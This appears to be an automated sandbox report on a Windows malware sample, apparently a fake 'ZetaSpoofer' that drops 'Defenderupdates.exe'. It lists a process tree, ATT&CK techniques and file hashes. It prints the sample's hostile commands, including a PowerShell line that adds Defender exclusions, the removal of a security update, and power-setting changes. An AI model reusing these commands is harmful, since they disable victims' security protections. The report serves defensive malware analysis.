C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2120

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2268

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3520

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2968

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4836

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3316

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 7522bf29946b94527ccf4e53889835c9 2MTTKjYPV0C7sAULSTo4og.0.1.0.0.0
1⤵
PID:3644
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4436

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:3612

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3920

C:\ProgramData\Defenderupdates.exe
C:\ProgramData\Defenderupdates.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2896
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1260
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4004
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2732
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1988
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3468
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2496
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4716
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4460
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:3500

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4752

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:5944

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:1468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Filesize
290B

MD5
94b02962c16ef4450939df341c241405

SHA1
62092c83c9141006ed46d4fba838eda2a51158d2

SHA256
8c351de24f038c78df072a9daba00769a60592c6fbd9a3882bd5f5e744934b7d

SHA512
4496548cbd07da5b58c49fc7741bb84d07f0c62fd7c88a3784fa94be3aa1a3b62a92dfb6aa8c7c84522603b34723dd98b0fb5f62c4091f1b0cd2710910d91dee

Download Submit
C:\Users\Admin\AppData\Local\Temp\Zeta.exe

Filesize
11.3MB

MD5
f79df4f96e90110491b16131ad54f231

SHA1
307be8cf98adb6c2f359ffa67c8e9476febadd5a

SHA256
817967415a85915d7d4b1ac89b3f0d0ae8c1fce55cb90d20c0893e191754ea1a

SHA512
ffa198a828b57344280065036eea34e928672bbdaba6fedbf3137cd69246a265bd0fbb7803e6806e474d2c96de4dc9a9cfa0f35b617b045673759afd976ee0c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe

Filesize
5.3MB

MD5
7bda2ed86f648c8528531d76f0a53f2a

SHA1
5c852efdb51b00cbfa0dc0ca0d017a3f52dae069

SHA256
667849a179671c441d44de621592f75bb3a2233f3c70370122fba047720e61e2

SHA512
075d1475b87ca7b2e1096077ffa58a7dd880c2f7f9a67b5283ed14223b9fd941f9136caff782a6ca8fc0831aaccb509fe44968447d2f1dd665bbd4cd9acda356

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\PIL\_imaging.cp39-win32.pyd

Filesize
2.0MB

MD5
9a1cbac8ca3860e21db2c1fb297b5b76

SHA1
97910a40ba50718ac31e8b85f701a0ac727e199e

SHA256
4c95efcb42780f849ee500f62c5eb8b5a54fea5b6df3371cd023459e9740b9e1

SHA512
6b779d578f57b0acffceb5b14cb21d24673e40378201943a5de62e3205d644e7b764da1798938f8f31ef5e9ee5d04eba695792f266b326d6e476e0cd9f57c9db

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\VCRUNTIME140.dll

Filesize
81KB

MD5
55c8e69dab59e56951d31350d7a94011

SHA1
b6af2d245ae4d67c38eb1cd31e0c1cffb29b9b2c

SHA256
9d8d21022ff9d3f6b81a45209662a4f3481edc2befae0c73b83cf942eab8be25

SHA512
efb2ac1891724df16268480628eb230b6ee37ed47b56d2e02a260559865cdd48ee340ce445e58f625e0f4d6dbdc5bfb7ce2eeedf564b837cff255ef7d1dc58cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_asyncio.pyd

Filesize
56KB

MD5
87ec92f3a05fe07a087d5137d218386f

SHA1
840b88107ac72c5752c6db422a54fa3459f5a3b6

SHA256
c60416af400ee4a75b957de9c19f1e50af7287c89bbe0b3d6a3f0c0829daaf4a

SHA512
a0c1501bd19759ffd471edc5b92f48a7d3b69ec9e257e03f74f5ce574776c6d927c58a1f6460455ed096c0e538a673528a16723dfda6303fe831e2ca672bb1ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_bz2.pyd

Filesize
75KB

MD5
387725bc6de235719ae355dfaa81e67c

SHA1
428b74b0bf8acd04eb20dc5a016352042c812c7a

SHA256
a9de8848c95518434cb5c2a9cb9d648cba140021e49f2e5212becf13a329b5d0

SHA512
bed2d6902f2ddd7dc7c2043c210ce682df75616ca63d163b756559dc7d33e926733f96d5407dc856061fba711ce41de9b01bb7b9db3940fa359c32c40d9f8233

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_ctypes.pyd

Filesize
112KB

MD5
aff88d04f5d45e739902084fce6da88a

SHA1
6ce6a89611069deaa7c74fa4fa86882dc21b5801

SHA256
34371eb9b24ba67ce6803d965cf5f0fe88ef4762af648ec2183e5bf21835d876

SHA512
8dd8f90ae1cc0fbc76f0039bc12e1aee7b2718017f4f9b09361001bed7b278b84f20d0fffceda4d5edd8744140cfdf1ca52497645d0480f5d42934f7df9808ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_decimal.pyd

Filesize
224KB

MD5
680d0a29b8ad9cdb2ddd8d6b59e2fecd

SHA1
8ec37f37622d29d3025bc6007dfb11ff3ec31a07

SHA256
21034f441ffdea24ad10dbbce5ba440c2135bb809695dfbeb2d860325135bc61

SHA512
f2a96fb98f2c4ec544b3bc0d289139ecc08b8e53140380d8cfda335d367f6465a7557161a8ca18944d11b2b1fd3a1d1eaaa27ed8c003b0b0b57c5c960846b47b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_elementtree.pyd

Filesize
172KB

MD5
3a30ba2fa5d1ef52ad50ebb875110b72

SHA1
96501e242e94907be5b70c61ef13017f22f9df18

SHA256
e45209f2a035c64d3a6fed019241983704e021bab32abd068a7954eedd640101

SHA512
a340d58c96e46cf539d9732fbb3b0cbd82965176c4bd27b33adcb1d50e25cafe23d56bde4fda2f0287510f21e4f12257534ef395780fa38bc4c55aa808893728

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_hashlib.pyd

Filesize
50KB

MD5
fdfa235f58a04d19e1ce923ca0d8ae19

SHA1
4a1178ba7e9a56f8c68dc3391a169222c67237e9

SHA256
7ad484e99ea33e4eea2cbf09203fb9dbd0c2c325b96e6cf2ffd146156c93bf7a

SHA512
0fe187e1019c159c0ee90fbc8eea20e40a28ff05223321d04784e577b60a2c0a3a476fabc71bd81dd08e7a127bb6cb03edf5d604bfdda38516fb2c90148dd118

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_lzma.pyd

Filesize
157KB

MD5
f6b74ac19fb0601a4e612a8dc0c916e3

SHA1
d4a77386caf7f70e66d5ec4543c8d9de0e4bc39f

SHA256
ce2ea2c96afd8c0cf97fc55130f835b6625a0772d86b259ea82bbc0b3def75e6

SHA512
0b60c51f76eb6872000d92bbec7fdabf687f5096fd12f1456cf26ad6033c22b998aee94842fda800288bef94790608204f97a7ed034544a1377cbf9722c6a826

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_multiprocessing.pyd

Filesize
25KB

MD5
d165a01fe4f19ba9cb74b9aff5c79d80

SHA1
f78083226d6b37c7c3ecca55a0ab8f2227b5f6ef

SHA256
f87547427b693640e45b8fc51a2efbaca75e6f915e5516f8ea81ebe010e0f89d

SHA512
efa96cee1721ba2f374d31766d720f8bccd34fdec206849cb9ddcf1b149f0a6068ef23aecfa8e2a092d08f3b7db46c0e3e1cf2d891a999265110404f934ce226

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_overlapped.pyd

Filesize
37KB

MD5
6ad0656b55a9a4d0544d295b8b54a5e5

SHA1
5b0ba4d95bb325aef33971ebceee0d86fee80df0

SHA256
dcf4ebaacf2fa99d9310bf21e1f18eb7fb6f4d02f7731b3542403ecab9748ac6

SHA512
86ad66151556a9ff882befb8c2fd2e51e846078b3e3b34b1e7bf5e5e43f74bee62e111b0c79f6a0580dc6e27b37d7f26aec91bc6240687e7fd8a70b9601f8b0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_queue.pyd

Filesize
24KB

MD5
9cddd43f5b53ab8993e46b24b68d8424

SHA1
7327ed8baf41f86d122137c511656f98d99ff990

SHA256
fa262ab8fb1caf23abf125e1b9d69c78727be3d8274e13ebe83e71f1058406d3

SHA512
9661968a986af5495bb3632e0a658885933ed733d64785627597456a5cef9521359a078f64af78464675698aff8f4b3cf844a56a8adbe4d69d4abe8fba3ca542

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_socket.pyd

Filesize
68KB

MD5
a9450642d8832893998bd213d98d509b

SHA1
3ef416ffaa438a2809cdffddd1b2717461ead7d4

SHA256
5407750d69d74318ec66bd1464558c07c06c6aa9edbc0641cd2dd7533378772b

SHA512
93027a694800d2d92ba773e8232ee016946ee9b36ba211537619df0508e9f50660b9a292d29dd4e90c2406b29bd3b1f8e4eb2226945b7163b2bd3227d4482323

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_ssl.pyd

Filesize
138KB

MD5
620f8f46eed249f7a7881656ad22062d

SHA1
709c772808ff2e894cdf1066c28287e92fc643c5

SHA256
dbceda1c97bfc8f6a0d1d17df6a2d7e1d44c59718cd652e0a5975052b218c590

SHA512
2bc2674603db7e29005b84b5de9cefa98737ebbdab5f5a034856c26099872e6886c8b6a41f2cdb2bb52a84ae1a15ae21b6394e1fe6820ba4fe0c7d88f3b1511a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_tcl_data\auto.tcl

Filesize
20KB

MD5
5e9b3e874f8fbeaadef3a004a1b291b5

SHA1
b356286005efb4a3a46a1fdd53e4fcdc406569d0

SHA256
f385515658832feb75ee4dce5bd53f7f67f2629077b7d049b86a730a49bd0840

SHA512
482c555a0da2e635fa6838a40377eef547746b2907f53d77e9ffce8063c1a24322d8faa3421fc8d12fdcaff831b517a65dafb1cea6f5ea010bdc18a441b38790

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_tcl_data\encoding\cp1252.enc

Filesize
1KB

MD5
5900f51fd8b5ff75e65594eb7dd50533

SHA1
2e21300e0bc8a847d0423671b08d3c65761ee172

SHA256
14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0

SHA512
ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_tcl_data\init.tcl

Filesize
23KB

MD5
b900811a252be90c693e5e7ae365869d

SHA1
345752c46f7e8e67dadef7f6fd514bed4b708fc5

SHA256
bc492b19308bc011cfcd321f1e6e65e6239d4eeb620cc02f7e9bf89002511d4a

SHA512
36b8cdba61b9222f65b055c0c513801f3278a3851912215658bcf0ce10f80197c1f12a5ca3054d8604da005ce08da8dcd303b8544706b642140a49c4377dd6ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_tcl_data\package.tcl

Filesize
22KB

MD5
55e2db5dcf8d49f8cd5b7d64fea640c7

SHA1
8fdc28822b0cc08fa3569a14a8c96edca03bfbbd

SHA256
47b6af117199b1511f6103ec966a58e2fd41f0aba775c44692b2069f6ed10bad

SHA512
824c210106de7eae57a480e3f6e3a5c8fb8ac4bbf0a0a386d576d3eb2a3ac849bdfe638428184056da9e81767e2b63eff8e18068a1cf5149c9f8a018f817d3e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_tcl_data\tclIndex

Filesize
5KB

MD5
e127196e9174b429cc09c040158f6aab

SHA1
ff850f5d1bd8efc1a8cb765fe8221330f0c6c699

SHA256
abf7d9d1e86de931096c21820bfa4fd70db1f55005d2db4aa674d86200867806

SHA512
c4b98ebc65e25df41e6b9a93e16e608cf309fa0ae712578ee4974d84f7f33bcf2a6ed7626e88a343350e13da0c5c1a88e24a87fcbd44f7da5983bb3ef036a162

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_tcl_data\tm.tcl

Filesize
11KB

MD5
f9ed2096eea0f998c6701db8309f95a6

SHA1
bcdb4f7e3db3e2d78d25ed4e9231297465b45db8

SHA256
6437bd7040206d3f2db734fa482b6e79c68bcc950fba80c544c7f390ba158f9b

SHA512
e4fb8f28dc72ea913f79cedf5776788a0310608236d6607adc441e7f3036d589fd2b31c446c187ef5827fd37dcaa26d9e94d802513e3bf3300e94dd939695b30

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_tk_data\pkgIndex.tcl

Filesize
363B

MD5
a6448af2c8fafc9a4f42eaca6bf6ab2e

SHA1
0b295b46b6df906e89f40a907022068bc6219302

SHA256
cd44ee7f76c37c0c522bd0cfca41c38cdeddc74392b2191a3af1a63d9d18888e

SHA512
5b1a8ca5b09b7281de55460d21d5195c4ee086bebdc35fa561001181490669ffc67d261f99eaa900467fe97e980eb733c5ffbf9d8c541ede18992bf4a435c749

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_tk_data\tk.tcl

Filesize
22KB

MD5
3250ec5b2efe5bbe4d3ec271f94e5359

SHA1
6a0fe910041c8df4f3cdc19871813792e8cc4e4c

SHA256
e1067a0668debb2d8e8ec3b7bc1aec3723627649832b20333f9369f28e4dfdbf

SHA512
f8e403f3d59d44333bce2aa7917e6d8115bec0fe5ae9a1306f215018b05056467643b7aa228154ddced176072bc903dfb556cb2638f5c55c1285c376079e8fe3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_tkinter.pyd

Filesize
58KB

MD5
a475634789bb1284d75e55870462a74a

SHA1
af7bfe3ffeef7479549831c5cd0de487151a6c5f

SHA256
725a13950969db01ad20af1f36eb28d6011a2feb31bd8c112b6bed2d025bc761

SHA512
9ca2f331d9ca22732ab0cf12a42d1b221f5daf01b5a83c43a4ba0b48798289d52428ab17cdedfde9eb2daf5f12304fe28e2c4d2306399b7fa562acdc74487a19

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\_uuid.pyd

Filesize
19KB

MD5
8f3020f3fc4ab65c2cf9191f38749d26

SHA1
61838e10f152fa7d1632fddf7646de4c669e9036

SHA256
f12a7102bcbb9ca5f57d13474f8da916ad42a9a4d8c8b22be24ee3b6916f54e3

SHA512
8113095d7e344bb163a7759e059db97671636a57fe008d2eb64aded4fe3d7c44403941ac36a520c17bf8cd9a8aab8d8324e138014249b23fad03b10140d7b8e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\base_library.zip

Filesize
822KB

MD5
402e295023318da79efcecb016b4bab8

SHA1
ed63aa096e4eff41e511a368dc5f167745f3530d

SHA256
848716e915976e3c898011a01e7167bf3dc7ab52eea7731fb05c8f6b5a6e413e

SHA512
e1a284b97bbe1f60bc9a89fff76599484ebfa9b65879ed47f82062782aa03092c14fabda6f8af592818d36d22bc0f422db4b62565ee92d87df9b5d34b9e8cbc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\btc_logo.png

Filesize
47KB

MD5
928a7f15372cc4fb1b2c154ec6603e5d

SHA1
4e1a0db1a13f10510a7d017bd5deef1156a6d0ea

SHA256
45b633f82ba0eee91b529c5c0a2f3a92c277cac920aa8470b95d594d661c1d8f

SHA512
2e35d2a95fe06f814101278474fcdc9c0d967e83a45fe954c064e901eb7cd89acd85ce3b4c7fdeb4423054187d7e01c895a49df888547ecb9d8232591d5ec901

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\customtkinter\assets\themes\blue.json

Filesize
4KB

MD5
05eb3947ce9a8c3bef66c14d0f938671

SHA1
06ffc811ee51609809d88894022e222b339aefee

SHA256
c9417470c16ced7a43d6c4a8e027afa6edc62c24d5aee7c4c2dcd11385964d3b

SHA512
4db7c14fba78185edf6459016608cb8fa0a250dfb48432c552bb4e0466cf49622b34d847e17c254bb1c8d15bf365e91bce3ede552ba8733fde9d21779f7f1c13

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\eth_logo.png

Filesize
156KB

MD5
86b356aa4636232f3e200c65d2a8b6b4

SHA1
3f415cd75e8a755a032ae16a3406c41dcc2d667a

SHA256
7af0cf14f1d0a35e2446b1ad8db4fc424c6735c4ca2ded1410f8d3ad69456913

SHA512
a2e8a2b8039b0a0f3fbd8d4a89554b313f7cab24530426eafc2d9a1b63e5c126fb419b61826894a2cc5f42f2c298151cec05d0e73aae55f419da60ad02b45a38

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\libcrypto-1_1.dll

Filesize
2.1MB

MD5
aad424a6a0ae6d6e7d4c50a1d96a17fc

SHA1
4336017ae32a48315afe1b10ff14d6159c7923bc

SHA256
3a2dba6098e77e36a9d20c647349a478cb0149020f909665d209f548dfa71377

SHA512
aa4b74b7971cb774e4ae847a226cae9d125fadc7cde4f997b7564dff4d71b590dcbc06a7103451b72b2afe3517ab46d3be099c3620c3d591ccbd1839f0e8f94a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\libffi-7.dll

Filesize
28KB

MD5
bc20614744ebf4c2b8acd28d1fe54174

SHA1
665c0acc404e13a69800fae94efd69a41bdda901

SHA256
0c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57

SHA512
0c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\libssl-1_1.dll

Filesize
525KB

MD5
697766aba55f44bbd896cbd091a72b55

SHA1
d36492be46ea63ce784e4c1b0103ba21214a76fb

SHA256
44a228b3646eb3575abd5cbcb079e018de11ca6b838a29e4391893de69e0cf4b

SHA512
206957347540f1356d805bf4a2d062927e190481aadc105c3012e69623149850a846503fca30fc38298f74d7f8f69761fddd0aa7f5e31fedb1fa5e5c9de56e9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\pyexpat.pyd

Filesize
164KB

MD5
3e43bcc2897f193512990e9e9024111b

SHA1
11dec8c9a1c4b45de9c980125eaef462038c1f2a

SHA256
0d8ac2a2b81176a06b0fb8663702428d2cdd5bedeab68b04210bf5cb6b49a475

SHA512
e629f23a9ad1274b57a47b170e598e47f28984dc2aaf4985ded9b217f4288222190eabe5a9fd4b11fa3eadb42040d8a532090544bf46be288b7310966d126aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\python39.dll

Filesize
4.2MB

MD5
2a9c5db70c6906571f2ca3a07521baa2

SHA1
765fa27bbee6a02b20b14b2b78c92a880e6627e5

SHA256
c69ce89b0487d86a63b64951207781f8051282afde67b20d3b8374c1a067f611

SHA512
fa4a677eaae2d258ac4f083a4e7009d985523b964ada93f53dc399a88c14970c7be2d2f39a7b38a922b58d134df2ede954554dcd00a4895e4273161867acac53

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\select.pyd

Filesize
23KB

MD5
1559cf3605d62c03d6ff2440ea3e175f

SHA1
26faec2bafd8523d1705021d06c56947b58cda1c

SHA256
b8da64fa424e5fb2bc8de93d2c0dcb55076cd9345452d3c624b3fcbbbe15644b

SHA512
1891a356ae98a09a7476697b6e7dd0de6b940043910a9aa414e17a523118d76dd0c55ea786d9bd2a77d792bdf95a75b272352eb813d928c429a707a78c09f05c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

Filesize
1KB

MD5
4ce7501f6608f6ce4011d627979e1ae4

SHA1
78363672264d9cd3f72d5c1d3665e1657b1a5071

SHA256
37fedcffbf73c4eb9f058f47677cb33203a436ff9390e4d38a8e01c9dad28e0b

SHA512
a4cdf92725e1d740758da4dd28df5d1131f70cef46946b173fe6956cc0341f019d7c4fecc3c9605f354e1308858721dada825b4c19f59c5ad1ce01ab84c46b24

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\tcl86t.dll

Filesize
1.3MB

MD5
30195aa599dd12ac2567de0815ade5e6

SHA1
aa2597d43c64554156ae7cdb362c284ec19668a7

SHA256
e79443e9413ba9a4442ca7db8ee91a920e61ac2fb55be10a6ab9a9c81f646dbb

SHA512
2373b31d15b39ba950c5dea4505c3eaa2952363d3a9bd7ae84e5ea38245320be8f862dba9e9ad32f6b5a1436b353b3fb07e684b7695724a01b30f5ac7ba56e99

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\tcl8\8.5\msgcat-1.6.1.tm

Filesize
33KB

MD5
db52847c625ea3290f81238595a915cd

SHA1
45a4ed9b74965e399430290bcdcd64aca5d29159

SHA256
4fdf70fdcedef97aa8bd82a02669b066b5dfe7630c92494a130fc7c627b52b55

SHA512
5a8fb4ada7b2efbf1cadd10dbe4dc7ea7acd101cb8fd0b80dad42be3ed8804fc8695c53e6aeec088c2d4c3ee01af97d148b836289da6e4f9ee14432b923c7e40

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\tk86t.dll

Filesize
1.1MB

MD5
6cadec733f5be72697d7112860a0905b

SHA1
6a6beeef3b1bb7c85c63f4a3410e673fce73f50d

SHA256
19f70dc79994e46d3e1ef6be352f5933866de5736d761faa8839204136916b3f

SHA512
e6b3e52968c79d4bd700652c1f2ebd0366b492fcda4e05fc8b198791d1169b20f89b85ec69cefa7e099d06a78bf77ff9c3274905667f0c94071f47bafad46d79

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\unicodedata.pyd

Filesize
1.1MB

MD5
bd51c8fbb9bfc437e19cb19042bfeae8

SHA1
8e537acb5a5f421ae4290681ed7d295ac8e86ca2

SHA256
1ccf9fa395e963daf8aba5a2acd68c5b13ee04b6b689a601652bcf04e7f25f8a

SHA512
6dd7041ee42dc2f67eef5efb0eb519dfc79cb19293693d9fb6e60e4cff374e3f955f7e09c8d9526fb5e1a3014875bd09a712d397a7068ac0900c6f8b754d8e6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46762\zeta_icon.png

Filesize
101KB

MD5
37c8bfddeff3b0c74eed7eca94d4bb7b

SHA1
6ecee7d47c7e5a350581a193a72f73ccfbdc8c6a

SHA256
ee5c971c5e6d374de4c78e2b1e975651a95af2ea2e7687afa75ca58eea3e47c5

SHA512
12f0a8b24d5d5d9daed81eea349093ee2be1e2e6043351015b49820ea6c84765c251eaa4f24efa479a0081f3c1cd59989d94281f1836acec0b11ee4997cd0b0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v3r5ti0e.gmn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-2437139445-1151884604-3026847218-1000\Preferred

Filesize
24B

MD5
c3cdde4b92a374ff9cd819e131c7c325

SHA1
a7c21173e4a2969a2817fcd22229723e02764938

SHA256
eba5bad7629fbb38c353a477314aa49dde0cf67b8ae0d829eb9aa0f5f496bcfc

SHA512
5c631af818a159f62d28718469613818b63dc6ecd0804cbe6441163da36020f533faf850f683afb70edeeb9bd0d42d18161b9dd9c3ffbad36daaa898af0c9c7a

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
8abf2d6067c6f3191a015f84aa9b6efe

SHA1
98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

SHA256
ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

SHA512
c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
f313c5b4f95605026428425586317353

SHA1
06be66fa06e1cffc54459c38d3d258f46669d01a

SHA256
129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

SHA512
b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
ceb7caa4e9c4b8d760dbf7e9e5ca44c5

SHA1
a3879621f9493414d497ea6d70fbf17e283d5c08

SHA256
98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

SHA512
1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

Download Submit
